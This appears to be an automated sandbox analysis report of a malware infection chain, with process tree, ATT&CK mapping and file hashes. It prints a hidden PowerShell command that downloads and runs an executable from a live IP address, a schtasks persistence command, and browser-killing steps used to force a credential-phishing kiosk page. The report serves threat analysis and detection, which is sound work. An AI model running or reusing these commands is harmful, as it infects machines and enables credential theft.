efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a FvbuInU.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1784 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 2084 powershell.exe 2084 powershell.exe 2084 powershell.exe 3068 TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE 2352 rapes.exe 3044 4665ecc86d.exe 2552 a56a18c370.exe 2384 2a1bc9d8d6.exe 2384 2a1bc9d8d6.exe 2384 2a1bc9d8d6.exe 2384 2a1bc9d8d6.exe 2384 2a1bc9d8d6.exe 2648 a2a6d35a13.exe 1676 a3f26c3fce.exe 1612 b668242231.exe 1612 b668242231.exe 2972 e16f9098dd.exe 2972 e16f9098dd.exe 2972 e16f9098dd.exe 3160 cnntXtU.exe 2460 FvbuInU.exe 2460 FvbuInU.exe 2460 FvbuInU.exe 2460 FvbuInU.exe 2460 FvbuInU.exe 2460 FvbuInU.exe 3864 ce4pMzk.exe 3864 ce4pMzk.exe 3864 ce4pMzk.exe 3864 ce4pMzk.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2084 powershell.exe Token: SeDebugPrivilege 984 76e0807425.exe Token: SeDebugPrivilege 3024 taskkill.exe Token: SeDebugPrivilege 2892 taskkill.exe Token: SeDebugPrivilege 316 taskkill.exe Token: SeDebugPrivilege 892 taskkill.exe Token: SeDebugPrivilege 2000 taskkill.exe Token: SeDebugPrivilege 2840 firefox.exe Token: SeDebugPrivilege 2840 firefox.exe Token: SeDebugPrivilege 2972 e16f9098dd.exe Token: SeDebugPrivilege 3160 cnntXtU.exe Token: SeDebugPrivilege 3864 ce4pMzk.exe -
Suspicious use of FindShellTrayWindow 19 IoCs
pid Process 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 3068 TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 2840 firefox.exe 2840 firefox.exe 2840 firefox.exe 2840 firefox.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 3384 nhDLtPT.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 2840 firefox.exe 2840 firefox.exe 2840 firefox.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe 1612 b668242231.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3160 cnntXtU.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2552 wrote to memory of 1036 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 30 PID 2552 wrote to memory of 1036 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 30 PID 2552 wrote to memory of 1036 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 30 PID 2552 wrote to memory of 1036 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 30 PID 2552 wrote to memory of 1904 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 31 PID 2552 wrote to memory of 1904 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 31 PID 2552 wrote to memory of 1904 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 31 PID 2552 wrote to memory of 1904 2552 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe 31 PID 1036 wrote to memory of 1784 1036 cmd.exe 33 PID 1036 wrote to memory of 1784 1036 cmd.exe 33 PID 1036 wrote to memory of 1784 1036 cmd.exe 33 PID 1036 wrote to memory of 1784 1036 cmd.exe 33 PID 1904 wrote to memory of 2084 1904 mshta.exe 34 PID 1904 wrote to memory of 2084 1904 mshta.exe 34 PID 1904 wrote to memory of 2084 1904 mshta.exe 34 PID 1904 wrote to memory of 2084 1904 mshta.exe 34 PID 2084 wrote to memory of 3068 2084 powershell.exe 37 PID 2084 wrote to memory of 3068 2084 powershell.exe 37 PID 2084 wrote to memory of 3068 2084 powershell.exe 37 PID 2084 wrote to memory of 3068 2084 powershell.exe 37 PID 3068 wrote to memory of 2352 3068 TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE 38 PID 3068 wrote to memory of 2352 3068 TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE 38 PID 3068 wrote to memory of 2352 3068 TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE 38 PID 3068 wrote to memory of 2352 3068 TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE 38 PID 2352 wrote to memory of 3044 2352 rapes.exe 40 PID 2352 wrote to memory of 3044 2352 rapes.exe 40 PID 2352 wrote to memory of 3044 2352 rapes.exe 40 PID 2352 wrote to memory of 3044 2352 rapes.exe 40 PID 2352 wrote to memory of 984 2352 rapes.exe 41 PID 2352 wrote to memory of 984 2352 rapes.exe 41 PID 2352 wrote to memory of 984 2352 rapes.exe 41 PID 2352 wrote to memory of 984 2352 rapes.exe 41 PID 984 wrote to memory of 1548 984 76e0807425.exe 42 PID 984 wrote to memory of 1548 984 76e0807425.exe 42 PID 984 wrote to memory of 1548 984 76e0807425.exe 42 PID 984 wrote to memory of 1548 984 76e0807425.exe 42 PID 984 wrote to memory of 1548 984 76e0807425.exe 42 PID 984 wrote to memory of 1548 984 76e0807425.exe 42 PID 984 wrote to memory of 1548 984 76e0807425.exe 42 PID 984 wrote to memory of 1548 984 76e0807425.exe 42 PID 984 wrote to memory of 1548 984 76e0807425.exe 42 PID 984 wrote to memory of 1548 984 76e0807425.exe 42 PID 984 wrote to memory of 1740 984 76e0807425.exe 43 PID 984 wrote to memory of 1740 984 76e0807425.exe 43 PID 984 wrote to memory of 1740 984 76e0807425.exe 43 PID 984 wrote to memory of 1740 984 76e0807425.exe 43 PID 1548 wrote to memory of 2100 1548 76e0807425.exe 45 PID 1548 wrote to memory of 2100 1548 76e0807425.exe 45 PID 1548 wrote to memory of 2100 1548 76e0807425.exe 45 PID 1548 wrote to memory of 2100 1548 76e0807425.exe 45 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 3044 wrote to memory of 1412 3044 4665ecc86d.exe 46 PID 2352 wrote to memory of 2552 2352 rapes.exe 47 PID 2352 wrote to memory of 2552 2352 rapes.exe 47 PID 2352 wrote to memory of 2552 2352 rapes.exe 47 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1784
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE"C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe"C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1412
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 10208⤵
- Loads dropped DLL
- Program crash
PID:2100
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 5087⤵
- Loads dropped DLL
- Program crash
PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe"C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2552 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1828
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe"C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2384
-
-
C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe"C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 12047⤵
- Loads dropped DLL
- Program crash
PID:1888
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe"C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1676
-
-
C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe"C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1612 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:1452
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2840 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.0.994059294\268589583" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6286e659-a441-4882-a98a-0a5ee3cdc511} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1292 b6ba358 gpu9⤵PID:2108
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.1.650304462\1396595912" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e3ef407-e24a-4d03-8b85-0c5c0aa613a5} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1500 d73f58 socket9⤵PID:1304
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.2.1799686709\1027310904" -childID 1 -isForBrowser -prefsHandle 2068 -prefMapHandle 2064 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5363fbb2-0994-4857-95eb-e7a2926154be} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2080 19da9058 tab9⤵PID:1492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.3.550897298\1798261468" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f518dac-b087-470d-9016-eaf44777df06} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2916 d62d58 tab9⤵PID:1220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.4.931231338\790430380" -childID 3 -isForBrowser -prefsHandle 3944 -prefMapHandle 3940 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d67aeed-8ac1-42bd-b36f-e1fad7f623f6} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 3956 208dad58 tab9⤵PID:1176
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.5.1751415405\1535557933" -childID 4 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8717bd4e-e160-44c8-ab53-2f49ecb2f066} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4052 208db058 tab9⤵PID:1204
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.6.701966344\1456685151" -childID 5 -isForBrowser -prefsHandle 4228 -prefMapHandle 4232 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2376d85f-4b17-4b2b-a188-0facedd92900} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4216 20ef7b58 tab9⤵PID:884
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe"C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe"C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe"6⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3160
-
-
C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe"C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:3384 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3464
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe"C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3808
-
-
C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe"C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe"C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3644 -
C:\Users\Admin\AppData\Local\Temp\onefile_3644_133856914229929000\chromium.exeC:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4044
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3448 -
C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 5007⤵
- Loads dropped DLL
- Program crash
PID:1364
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"7⤵
- Executes dropped EXE
PID:3696
-
-
C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3728 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 10328⤵
- Loads dropped DLL
- Program crash
PID:3920
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 5127⤵
- Loads dropped DLL
- Program crash
PID:3788
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CXRG2YQS\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp
Filesize23KB
MD529840b80836cf007cb87c5155f230588
SHA100a0dcc50281e0fcbf6cfbc06647a19e3afc565c
SHA2569967b9a45f6f608bdc8c673518b4df82c01d0c5bd9dc77ccabdaef0ff3fe90f1
SHA5126e0ded07a22baa41269d93e053e6406ac7bc525c04f1f510b4c64e18bf321181dfa49fb525bde210b5d1742ee94ef350a16dbe04458fdcaad5a17649b2a08617
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
1.8MB
MD5b5db83c03a37b4cd4746a6080133e338
SHA1edf3f7e5c3bda89e1382df8f7d0443783426c834
SHA2568bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df
SHA512e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313
-
Filesize
3.7MB
MD5d054bcb257edeee50293394229ab1c67
SHA180f84013bdc91aa820a0534a297be285e9f0c9f8
